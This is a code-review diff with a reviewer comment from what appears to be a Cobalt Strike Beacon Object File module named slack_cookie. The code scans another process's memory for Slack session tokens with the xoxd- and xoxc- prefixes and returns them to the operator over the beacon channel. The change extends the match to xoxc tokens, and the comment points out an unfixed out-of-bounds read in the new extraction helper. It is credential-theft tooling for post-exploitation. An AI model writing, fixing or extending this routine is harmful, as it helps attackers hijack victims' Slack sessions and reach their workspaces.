src/Remote/slack_cookie/entry.c

```diff
@@ -89,11 +101,11 @@ void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz)
     for (index = 0; index < address_sz-5; index++)
     {
         size_t remainingSize = address_sz - index;
-        // search for xoxd- [78 6f 78 64 2d] 
-        if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && buffer[index + 3] == 0x64 && buffer[index + 4] == 0x2d)
+        // search for xox(c|d)- [78 6f 78 (63|64) 2d] 
+        if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && (buffer[index + 3] == 0x64 || buffer[index + 3] == 0x63) && buffer[index + 4] == 0x2d)
         {
-            BeaconPrintf(CALLBACK_OUTPUT, "Slack Cookie: %s", buffer + index);
-            index += MSVCRT$strnlen((char *)(buffer + index), remainingSize) - 1;
+            extractSubstring(buffer + index, output);
```

Comment:
I agree that we do have the original issue of going out of bounds on a non-null terminated read
The current implementation doesn't fix going out of bounds however as if we match one of our checks towards the end of our current buffer, extractSubstring doesn't account for how much data we have remaining